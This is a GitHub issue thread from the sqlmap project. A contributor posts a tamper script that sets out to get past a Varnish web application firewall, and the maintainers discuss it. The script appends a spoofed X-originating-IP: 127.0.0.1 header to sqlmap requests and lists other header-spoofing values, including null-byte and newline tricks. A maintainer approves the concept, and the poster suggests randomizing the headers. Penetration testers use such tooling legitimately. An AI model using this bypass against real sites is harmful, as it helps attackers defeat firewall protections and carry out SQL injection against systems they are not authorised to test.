Tamper Script to WAF Protection of Varnish Firewall

hansbonini commented 10 years ago

Tamper Script 0day - basic skeleton

#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import pprint

from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHER

def tamper(payload, **kwargs):

    singleTimeWarnMessage("Tampering WAF Protection of Varnish Firewall...")

    """
    Append a HTTP Request Parameter to ByPass
    WAF Protection of Varnish Firewall.

    You can tamper with different Parameters, like:
    >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
    >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
    >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
    >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
    >> X-remote-IP: * or %00 or %0A

        http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

    """

    conf.httpHeaders.append(("X-originating-IP", "127.0.0.1"))
    pprint.pprint(conf.httpHeaders)
    return payload

stamparm commented 10 years ago

This will need to be adjusted, but the concept is OK ;)

stamparm commented 10 years ago

hansbonini commented 10 years ago

That`s the idea... this is a basic concept. A good idea is randomize the varnish headers to do a more solid job.

sqlmapproject / sqlmap

Tamper Script to WAF Protection of Varnish Firewall #760